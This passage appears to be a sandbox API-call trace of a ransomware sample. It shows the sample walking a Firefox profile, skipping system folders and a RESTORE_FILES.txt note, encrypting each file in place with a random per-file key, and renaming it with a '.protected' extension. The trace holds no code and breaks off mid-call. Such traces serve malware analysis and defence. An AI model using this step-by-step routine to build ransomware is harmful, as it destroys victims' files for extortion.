pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat") returned 105 [0090.910] StrStrIW (lpFirst="pluginreg.dat", lpSrch=".protected") returned 0x0 [0090.910] lstrcmpW (lpString1="pluginreg.dat", lpString2="RESTORE_FILES.txt") returned -1 [0090.910] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.910] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.910] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.911] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat") returned 105 [0090.911] StrStrW (lpFirst="pluginreg.dat", lpSrch=".txt") returned 0x0 [0090.911] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat") returned 105 [0090.911] StrStrW (lpFirst="pluginreg.dat", lpSrch=".rar") returned 0x0 [0090.911] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat") returned 105 [0090.911] StrStrW (lpFirst="pluginreg.dat", lpSrch=".zip") returned 0x0 [0090.911] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0xe14, lpOverlapped=0x0) returned 1 [0090.913] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff1ec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.913] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0xe14, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0xe14, lpOverlapped=0x0) returned 1 [0090.913] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.913] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.913] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.913] CloseHandle (hObject=0x154) returned 1 [0090.913] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat.protected") returned 115 [0090.914] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\pluginreg.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\pluginreg.dat.protected")) returned 1 [0090.914] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.914] lstrcmpiW (lpString1="prefs.js", lpString2="Windows") returned -1 [0090.914] lstrcmpiW (lpString1="prefs.js", lpString2="Program Files") returned -1 [0090.914] lstrcmpiW (lpString1="prefs.js", lpString2="Program Files (x86)") returned -1 [0090.914] lstrcmpiW (lpString1="prefs.js", lpString2="$Recycle.bin") returned 1 [0090.914] lstrcmpiW (lpString1="prefs.js", lpString2="System Volume Information") returned -1 [0090.914] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js") returned 100 [0090.915] StrStrIW (lpFirst="prefs.js", lpSrch=".protected") returned 0x0 [0090.915] lstrcmpW (lpString1="prefs.js", lpString2="RESTORE_FILES.txt") returned -1 [0090.915] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.915] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.916] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js") returned 100 [0090.916] StrStrW (lpFirst="prefs.js", lpSrch=".txt") returned 0x0 [0090.916] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js") returned 100 [0090.916] StrStrW (lpFirst="prefs.js", lpSrch=".rar") returned 0x0 [0090.916] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js") returned 100 [0090.916] StrStrW (lpFirst="prefs.js", lpSrch=".zip") returned 0x0 [0090.916] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0xfde, lpOverlapped=0x0) returned 1 [0090.917] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff022, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.917] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0xfde, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0xfde, lpOverlapped=0x0) returned 1 [0090.918] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.918] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.918] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.918] CloseHandle (hObject=0x154) returned 1 [0090.918] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js.protected") returned 110 [0090.919] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\prefs.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\prefs.js.protected")) returned 1 [0090.919] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.919] lstrcmpiW (lpString1="search.json", lpString2="Windows") returned -1 [0090.919] lstrcmpiW (lpString1="search.json", lpString2="Program Files") returned 1 [0090.919] lstrcmpiW (lpString1="search.json", lpString2="Program Files (x86)") returned 1 [0090.919] lstrcmpiW (lpString1="search.json", lpString2="$Recycle.bin") returned 1 [0090.920] lstrcmpiW (lpString1="search.json", lpString2="System Volume Information") returned -1 [0090.920] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json") returned 103 [0090.920] StrStrIW (lpFirst="search.json", lpSrch=".protected") returned 0x0 [0090.920] lstrcmpW (lpString1="search.json", lpString2="RESTORE_FILES.txt") returned 1 [0090.920] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.920] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.921] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json") returned 103 [0090.921] StrStrW (lpFirst="search.json", lpSrch=".txt") returned 0x0 [0090.921] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json") returned 103 [0090.921] StrStrW (lpFirst="search.json", lpSrch=".rar") returned 0x0 [0090.921] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json") returned 103 [0090.921] StrStrW (lpFirst="search.json", lpSrch=".zip") returned 0x0 [0090.921] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.923] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.923] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.923] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.924] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.924] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.924] CloseHandle (hObject=0x154) returned 1 [0090.924] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json.protected") returned 113 [0090.924] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\search.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\search.json.protected")) returned 1 [0090.925] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.925] lstrcmpiW (lpString1="secmod.db", lpString2="Windows") returned -1 [0090.925] lstrcmpiW (lpString1="secmod.db", lpString2="Program Files") returned 1 [0090.925] lstrcmpiW (lpString1="secmod.db", lpString2="Program Files (x86)") returned 1 [0090.925] lstrcmpiW (lpString1="secmod.db", lpString2="$Recycle.bin") returned 1 [0090.925] lstrcmpiW (lpString1="secmod.db", lpString2="System Volume Information") returned -1 [0090.925] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db") returned 101 [0090.925] StrStrIW (lpFirst="secmod.db", lpSrch=".protected") returned 0x0 [0090.925] lstrcmpW (lpString1="secmod.db", lpString2="RESTORE_FILES.txt") returned 1 [0090.925] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.925] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.926] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db") returned 101 [0090.926] StrStrW (lpFirst="secmod.db", lpSrch=".txt") returned 0x0 [0090.926] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db") returned 101 [0090.926] StrStrW (lpFirst="secmod.db", lpSrch=".rar") returned 0x0 [0090.926] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db") returned 101 [0090.926] StrStrW (lpFirst="secmod.db", lpSrch=".zip") returned 0x0 [0090.926] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.937] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.937] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0090.937] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.938] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.938] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.938] CloseHandle (hObject=0x154) returned 1 [0090.957] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db.protected") returned 111 [0090.957] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\secmod.db.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\secmod.db.protected")) returned 1 [0090.958] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.958] lstrcmpiW (lpString1="sessionstore.bak", lpString2="Windows") returned -1 [0090.958] lstrcmpiW (lpString1="sessionstore.bak", lpString2="Program Files") returned 1 [0090.958] lstrcmpiW (lpString1="sessionstore.bak", lpString2="Program Files (x86)") returned 1 [0090.958] lstrcmpiW (lpString1="sessionstore.bak", lpString2="$Recycle.bin") returned 1 [0090.958] lstrcmpiW (lpString1="sessionstore.bak", lpString2="System Volume Information") returned -1 [0090.958] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak") returned 108 [0090.958] StrStrIW (lpFirst="sessionstore.bak", lpSrch=".protected") returned 0x0 [0090.958] lstrcmpW (lpString1="sessionstore.bak", lpString2="RESTORE_FILES.txt") returned 1 [0090.958] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.958] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.959] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak") returned 108 [0090.959] StrStrW (lpFirst="sessionstore.bak", lpSrch=".txt") returned 0x0 [0090.959] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak") returned 108 [0090.959] StrStrW (lpFirst="sessionstore.bak", lpSrch=".rar") returned 0x0 [0090.959] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak") returned 108 [0090.959] StrStrW (lpFirst="sessionstore.bak", lpSrch=".zip") returned 0x0 [0090.959] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0x3d6, lpOverlapped=0x0) returned 1 [0090.983] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffc2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.983] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0x3d6, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesWritten=0x295e544*=0x3d6, lpOverlapped=0x0) returned 1 [0090.983] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.983] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0090.983] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0090.983] CloseHandle (hObject=0x154) returned 1 [0090.983] wnsprintfW (in: pszDest=0x503c40, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak.protected") returned 118 [0090.983] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak.protected")) returned 1 [0090.984] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0090.984] lstrcmpiW (lpString1="sessionstore.js", lpString2="Windows") returned -1 [0090.984] lstrcmpiW (lpString1="sessionstore.js", lpString2="Program Files") returned 1 [0090.984] lstrcmpiW (lpString1="sessionstore.js", lpString2="Program Files (x86)") returned 1 [0090.985] lstrcmpiW (lpString1="sessionstore.js", lpString2="$Recycle.bin") returned 1 [0090.985] lstrcmpiW (lpString1="sessionstore.js", lpString2="System Volume Information") returned -1 [0090.985] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js") returned 107 [0090.985] StrStrIW (lpFirst="sessionstore.js", lpSrch=".protected") returned 0x0 [0090.985] lstrcmpW (lpString1="sessionstore.js", lpString2="RESTORE_FILES.txt") returned 1 [0090.985] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0090.985] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0090.985] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0090.986] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js") returned 107 [0090.986] StrStrW (lpFirst="sessionstore.js", lpSrch=".txt") returned 0x0 [0090.986] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js") returned 107 [0090.986] StrStrW (lpFirst="sessionstore.js", lpSrch=".rar") returned 0x0 [0090.986] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.js") returned 107 [0090.986] StrStrW (lpFirst="sessionstore.js", lpSrch=".zip") returned 0x0 [0090.986] ReadFile (in: hFile=0x154, lpBuffer=0x503c40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x503c40*, lpNumberOfBytesRead=0x295e544*=0xbc5, lpOverlapped=0x0) returned 1 [0090.987] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff43b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.987] WriteFile (in: hFile=0x154, lpBuffer=0x503c40*, nNumberOfBytesToWrite=0xbc5, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | 